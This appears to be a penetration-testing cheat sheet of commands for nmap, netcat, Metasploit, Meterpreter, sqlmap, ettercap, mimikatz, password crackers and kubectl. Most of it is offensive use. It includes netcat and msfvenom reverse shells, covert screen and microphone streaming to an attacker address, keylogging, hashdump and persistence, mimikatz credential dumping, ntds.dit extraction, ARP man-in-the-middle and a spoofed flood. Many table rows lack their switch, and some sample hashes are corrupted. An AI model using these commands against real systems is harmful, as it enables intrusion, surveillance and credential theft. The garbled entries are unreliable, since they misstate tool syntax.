Tool Syntax

How to use the tools

Nmap command

Scanning methods

Switch          Explanation
                Scan with ping
                Scanning with SYN
                Scanning with TCP connect()
                Scanning with UDP
                Scanning with IP protocol
                Scanning along with versions
                Scanning with traceroute
-T4             Set the scanning speed (timing template between 0 and 5)
                Scan output in all formats
-iL list.txt    Scan the hosts listed in list.txt


Switch              Explanation
-oX file            Write output to an XML file
-oG file            Write output in grepable format
-oA file            Save output in all three formats
-iL file            Read the target hosts from a file
--excludefile file  Skip the hosts listed in the file

Advanced features

Switch                           Explanation
-sV -p <ports> --script=banner   Version detection plus banner grabbing on the given ports
                                 Draw a route map
                                 TTL code

Firewall evasion

Switch               Explanation
                     Crossed fasteners
-S ip                Spoof the source address
-g #                 Spoof the source port
-D ip,ip             Decoy scan using the listed IPs (comma-separated, no spaces)
--mtu #              Set the MTU size
--spoof-mac mac      Spoof the MAC address
--data-length size   Append random data of the given size to each packet
--scan-delay time    Wait the given time between probes
                     Set the minimum number of packets sent per second

Convert XML output to HTML

xsltproc nmap.xml -o nmap.html

List live hosts (-sP is the old name of the ping scan, -sn)

nmap -sP -n -oX out.xml <targets> | grep "Nmap scan report" | cut -d " " -f 5 > live_hosts.txt

Compare nmap results

ndiff scan1.xml scan2.xml

Reverse DNS lookup over an IP range

nmap -R -sL --dns-servers server <range>

IDS test (Xmas scan with decoy IPs and source spoofing)

for x in {1..10000..1}; do nmap -T5 -sX -S spoof-source-IP -D decoy-IP1,decoy-IP2 --spoof-mac aa:bb:cc:dd:ee:ff -e eth0 -Pn targeted-IP; done

List of nmap scripts

List SMB shares: smb-enum-shares.nse

Wireshark software

Filter                                              Explanation
                                                    RIP passwords
ip.addr / ip.dst / ip.src (ipv6. for IPv6)          IP addresses (any / destination / source)
                                                    TCP ports
tcp.flags (ack, fin, push, reset, syn, urg)         TCP flags
                                                    UDP ports
                                                    HTTP basic authentication
                                                    HTTP authentication
                                                    HTTP data
                                                    HTTP cookies
                                                    HTTP referrer path
                                                    HTTP servers
http.user_agent                                     The User-Agent header in HTTP
wlan.fc.type eq 0                                   802.11 management frame
wlan.fc.type eq 1                                   802.11 control frame
wlan.fc.type eq 2                                   802.11 data frame
wlan.fc.type_subtype eq 0 (1 = response)            802.11 association request
wlan.fc.type_subtype eq 2 (3 = response)            802.11 reassociation request
wlan.fc.type_subtype eq 4 (5 = response)            802.11 probe request
wlan.fc.type_subtype eq 8                           802.11 beacon
wlan.fc.type_subtype eq 10                          802.11 disassociate
wlan.fc.type_subtype eq 11 (12 = deauthenticate)    802.11 authentication

Comparison operators

eq OR ==
ne OR !=
gt OR >
lt OR <
ge OR >=
le OR <=

Logical operators

and OR &&
or  OR ||
xor OR ^^
not OR !

Netcat command

Connect to the [TargetIP] listener on [port]:
$ nc [TargetIP] [port]

Start a listener:
$ nc -l -p [port]

Start an HTTP proxy listener on port 3128 with ncat (on the Automation-Server host):
./ncat -l 3128 --proxy-type http &

Scan ports

TCP port scanner over the port range [startPort] to [endPort]:
$ nc -v -n -z -w1 [TargetIP] [startPort]-[endPort]

Transfer files

Send a file:
nc.exe [TargetIP] [port] < "file.log"

Receive a file:
nc -vnlp 1234 > file.txt

Grab a [filename] from a listener:
1. Start the listener that pushes [filename]
     $ nc -l -p [port] < [filename]
2. Connect to [TargetIP] and retrieve [filename]
     $ nc -w3 [TargetIP] [port] > [filename]

Push a [filename] to a listener:
1. Start the listener that pulls [filename]
     $ nc -l -p [port] > [filename]
2. Connect to [TargetIP] and push [filename]
     $ nc -w3 [TargetIP] [port] < [filename]

Backdoor shells

Linux shell:
$ nc -l -p [port] -e /bin/bash
Linux reverse shell:
$ nc [LocalIP] [port] -e /bin/bash
Windows shell:
$ nc -l -p [port] -e cmd.exe
Windows reverse shell:
$ nc [LocalIP] [port] -e cmd.exe

Use VLC for streaming

Use cvlc (command-line VLC) on the target to mitigate pop-ups.

Capture and stream the screen over UDP to the attacker's address on port 1234

# Start a listener on the attacker machine
vlc udp://@:1234

-- OR --

# Start a listener that stores the stream in a file
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

# Start streaming on the target machine. This may make the user's screen flash; lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=attackerip:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and stream the screen over HTTP

# Start a listener on the attacker machine

-- OR --

# Start a listener that stores the stream to a file
vlc -sout=#

# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and stream the screen to a multicast address

# Start a listener on the attacker machine for multicast
vlc udp://@multicastaddr:1234

# Broadcast the stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=multicastaddr:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and record the screen to a file

vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Record and stream the microphone over UDP

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH command

/etc/ssh/ssh_known_hosts   # System-wide known hosts
~/.ssh/known_hosts         # Hosts the user has logged into
sshd-generate              # Generate SSH host keys (DSA/RSA)
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key   # Generate the SSH DSA host key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key   # Generate the SSH RSA host key

If already in an SSH session, type the escape sequence ~C (tilde, then C) on a fresh line to open the ssh command line and configure a tunnel.
Port forwarding must be allowed on the target:
/etc/ssh/sshd_config - AllowTcpForwarding yes

Connect with SSH on a specific port

ssh root@ -p 8222

Reverse port forwarding using the tunnel (in the support user's reverse shell)

ssh -R 4446: master@
http 4446

Forward X11 from the victim to the attacker

vi ~/.ssh/config   # ensure 'ForwardX11 yes'
ssh -X root@

Create a remote port forward from port 8080 to port 443 on the attacker

ssh -R 8080:127.0.0.1:443 root@

Local port forward on the attacker's port 8080, tunnelling over SSH to port 3300

ssh -L 8080: root@

Dynamic tunnel using proxychains; also set the port (1080) in /etc/proxychains.conf

ssh -D 1080 root@
In a separate terminal run:
proxychains nmap -sT -p80,443

Create a multi-hop SSH tunnel

ssh -L 8888: 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444: 50mctf@MY_VPS

Metasploit software

Command                                           Explanation
msfconsole -r file.rc                             Load a resource file
msfcli | grep exploit/windows                     List Windows exploits
msfencode -l                                      List encoders
msfpayload -h                                     List payloads
show exploits                                     Display exploits
show auxiliary                                    Show auxiliary modules
show payloads                                     Show payloads
search string                                     Search for a specific string
search exploit string                             Search exploits
searchsploit -m exploits/php/webapps/             Copy the exploit file into the current directory
info module                                       Display module information
use module                                        Load an exploit or module
show options                                      Display module options
show advanced                                     Show advanced settings
set option value                                  Set a value
sessions -v                                       List sessions (-k # kill, -u # upgrade to Meterpreter)
sessions -s script                                Run the Meterpreter script in all sessions
jobs -l                                           List all jobs (-k # kill)
exploit -j                                        Run the exploit as a job
route add ip nmask sid                            Pivoting (route traffic through a session)
loadpath /home/modules                            Load a third-party module tree
                                                  Ruby shell
connect -s ip 443                                 Connect over SSL (netcat clone)
route add ip mask session_id                      Add a route through the pivot session
exploit/multi/handler - set ExitOnSession false   Keep the handler listening after a session opens
set ConsoleLogging true (also                     Enable console logging

Sqlmap command

Send a GET request:
sqlmap -u "http://url?id=1&str=val"

Send a POST request:
sqlmap -u "http://url" --data="id=1&str=val"

SQL injection in a specific parameter, with the database type known:
sqlmap -u "http://url" --data="id=1&str=val" -p "id" -b --dbms="mssql|mysql|oracle|postgres"

SQL injection on a page that requires authentication:
1. Log in and note the cookie values (cookie1=val1, cookie2=val2)
2. sqlmap -u "http://url" --data="id=1&str=val" -p "id" --cookie="cookie1=val1; cookie2=val2"

SQL injection, retrieving the database version, current database and current user:
sqlmap -u "http://url" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL injection, listing the tables of database testdb:
sqlmap -u "http://url" --data="id=1&str=val" -p "id" --tables -D testdb

SQL injection, listing the columns of a table:
sqlmap -u "http://url" --data="id=1&str=val" -p "id" --columns -T <table>

Read the request from a file:
sqlmap -r req.txt

Dump the records of the specified table from the specified database:
sqlmap -r req -D openemr -T users_secure --dump

Use the time-based blind technique:
sqlmap -r req --technique=T

More info

Bypass a WAF with unicode escaping:
sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns


Creating a Meterpreter payload (for Linux: -t file -o callback)

./msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port R | ./msfencode -t exe -o callback.exe -e x86/shikata_ga_nai -c 5

Create a payload with bind Meterpreter

./msfpayload windows/meterpreter/bind_tcp RHOST=ip LPORT=port X

Creating a Java reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=9999 -f WAR > exploit.war

Creating a reverse shell for Windows with msfvenom

msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows > reverse.exe

Generate an encoded payload using msfvenom

./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST= LPORT=443 > callback.exe

Start the msf database (bt5 = mysql, kali = postgresql)

/etc/rc.d/rc.mysqld start
msf > db_create root:pass@localhost/metasploit
msf > load db_mysql
msf > db_connect root:pass@localhost/metasploit
msf > db_import nmap.xml

--- Kali ---
# service postgresql start
# service metasploit start

Inject Meterpreter into a process (by default a new notepad is started and injected into)

msf > use post/windows/manage/multi_meterpreter_inject
msf > set IPLIST attack_ip
msf > set LPORT callback_port
msf > set PIDLIST PID_to_inject   # default creates a new notepad
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SESSION meterpreter_session_ID

Scan the internal network through the pivot and grab HTTP banners

msf > route add ip/range netmask meterpreter_ID
msf > use post/multi/gather/ping_sweep          # Set options and run
msf > use auxiliary/scanner/portscan/tcp        # Set options and run
msf > hosts -u -S x.x.x -R                      # Searches for x.x.x.* and sets RHOSTS
msf > use auxiliary/scanner/http/http_version   # Set options and run
msf > services -v -p 80 -S x.x.x -R             # Displays IPs x.x.x.* with port 80 open





Meterpreter commands

Command                                            Explanation
                                                   List of available commands
                                                   Display system information
ps                                                 List processes
                                                   List of available PIDs
upload file "C:\Program Files\"                    Upload a file
download file                                      Get a file
reg command                                        Interact with the registry
                                                   Back to the main user
                                                   Drop into an interactive shell
migrate PID                                        Migrate to another process
                                                   Put the current process in the background
keyscan_(start|stop|dump)                          Start/stop/dump the keylogger
execute -f cmd.exe -i                              Run cmd.exe and interact with it
execute -f cmd.exe -i -H -t                        Run cmd.exe as a hidden process with all tokens
hashdump                                           Get all local hashes
run script                                         Run a script (/scripts/meterpreter)
portfwd [add|delete] -l 443 -r <target> -p 3389    Forward local port 443 through the current session to RDP (3389) on the target

Increasing access level

use priv

Token impersonation (dropping the token stops the impersonation)

use incognito
list_tokens -u
impersonate_token domain\\user

Using nmap through a Meterpreter SOCKS proxy

1. msf > sessions                  # Note the Meterpreter ID
2. msf > route add <subnet> <netmask> <session id>
3. msf > use auxiliary/server/socks4a
4. msf > run
5. Open a new shell and edit /etc/proxychains.conf
   i.   #proxy_dns
   ii.  #socks4 127.0.0.1 9050
   iii. socks4 127.0.0.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,135,445 <target>
meterpreter > irb

Creating a persistent Windows service

msf > use post/windows/manage/persistence
msf > set LHOST attack_ip
msf > set LPORT callback_port
msf > set REXENAME filename
msf > set SESSION meterpreter_session_id
meterpreter > run post/windows/gather/dumplinks

Create a new process and write the directory tree of C:\ to a file

execute -H -f cmd.exe -a '/c tree /F /A c:\ > C:\temp\tree.txt'

Ettercap software

Man-in-the-Middle attack using filters

ettercap.exe -I iface -M arp -Tq -F file.ef MACs/IPs/Ports MACs/IPs/Ports
# i.e.: // 80,443 // = any MAC, any IP, ports 80,443

Man-in-the-Middle attack on the subnet with filters

ettercap -T -M arp -F filter // //

Switch flood attack

ettercap -TP rand_flood

Ettercap filters

Compile ettercap filters

etterfilter filter.filter -o out.ef

Example filter - drop VPN traffic (IKE, UDP 500) and match the Accept-Encoding header of HTTP requests

if (ip.proto == UDP && udp.dst == 500) {
    kill();
}
if (ip.src == 'ip') {
    if (tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            msg("Replaced Encoding\n");
        }
    }
}

Mimikatz command

1. Upload mimikatz.exe and sekurlsa.dll to the target
2. Execute mimikatz
3. mimikatz# privilege::debug
4. mimikatz# inject::process lsass.exe sekurlsa.dll
5. mimikatz# @getLogonPasswords
6. sekurlsa::minidump /users/redteam/Desktop/lsass.DMP
7. sekurlsa::logonPasswords


mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>


# Cleartext passwords and hashes
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

Hping3 command

hping3 targetIP --flood --frag --spoof ip --destport # --syn

Arping command

./arping -I eth# -a # arps

Wine command

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o file.exe /tmp/code.c
wine file.exe

GRUB software

GRUB menu: add 'single' to the end of the kernel line. Reboot. Change the root password. Reboot.

Hydra command

hydra -l ftp -P words -v targetIP ftp

hashcat software

NTLMv2 crack

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

John the Ripper software

Crack with a word list

$ ./john -wordfile:pw.lst -format:<format> hash.txt

Sample formats

$ john --format=des    username:SDbsuge8iC58A
$ john --format=lm     username:$LM$a9c604d244c4e99d
$ john --format=md5    $1$12345678$aiccj83HRD8o6ux1bVx7D1

$ john --format=raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D

# For --format=netlmv2 replace $NETLM with $NETLMv2
$ john --format=netlm

# Exactly 36 spaces between USER and HASH (SAPB and SAPG)
$ john --format=sapb
ROOT    $8366A4E9E68"2C80
username:ROOT    $8366A4E9E68"2C80

$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239

$ john --format=sha1-gen

$ john --format=zip

Password lists

Creating word variations based on one word

# Append a lowercase letter (@), uppercase letter (,), number (%) and symbol (^) to the end of the word
crunch 12 12 -t baseword@,%^ -o wordlist.txt

Use a custom special-character set: append two digits and then one special character
maskprocessor --custom-charset1='!@#$' 'baseword?d?d?1' -o wordlist.txt

Generate a wordlist from a website, including numbers
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

VSSOwn command

1. Download:
2. Create a new shadow copy
     a. cscript vssown.vbs /start (optional)
     b. cscript vssown.vbs /create
3. Pull the following files from the shadow copy:
     a. Copy
     b. Copy
     c. Copy
4. Copy the files to the attack box.
5. Download tools:
6. Configure and make the libesedb source code from the extracted package
     a. cd libesedb
     b. chmod +x configure
     c. ./configure && make
7. Use esedbdumphash to extract the data table from ntds.dit
     a. cd esedbtools
     b. ./esedbdumphash ../../ntds.dit

File hash

Hash lengths

MD5      16 bytes
SHA-1    20 bytes
SHA-256  32 bytes
SHA-512  64 bytes

Look up a hash in a known-software hash database (DNS TXT query)
# dig +short <md5>.<hash-db-domain> TXT
Result = "filename | source", e.g. "cmd.exe | NIST"

Malware hash database (DNS TXT query)
# dig +short <MD5|SHA-1>.<hash-db-domain> TXT
Result = last-seen timestamp and AV detection rate
Convert the timestamp: perl -e 'print scalar localtime(<timestamp>), "\n"'

Search in file metadata

Search the VirusTotal database

Guess the password of a zip file

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt <file.zip>

Guess the password of the WinRM service

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

Guess the password of the SMB service

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Connect to MSSQL with Impacket: -port 1433 sa@

PowerShell download files

powershell iwr <url> -usebasicparsing -OutFile mimikatz.exe

List pods

kubectl get pod

Check whether you have rights to exec into any pods

./kubectl auth can-i exec pods

Exec into sensitive-pod

./kubectl exec -it sensitive-pod /bin/bash

More information about the environment

kubectl get nodes -o wide


Discover Devices

python -m discovery

Scan for vulnerabilities

python -m vulnerability

Brute Force

python -m bruteforce

Exploit vulnerabilities

python -m exploit

Generate Payloads

python -m payloads


Sniffer

python -m sniffer

DoS attacks

python -m dos

Password Attacks

python -m password

Shodan Integration

python -m shodan
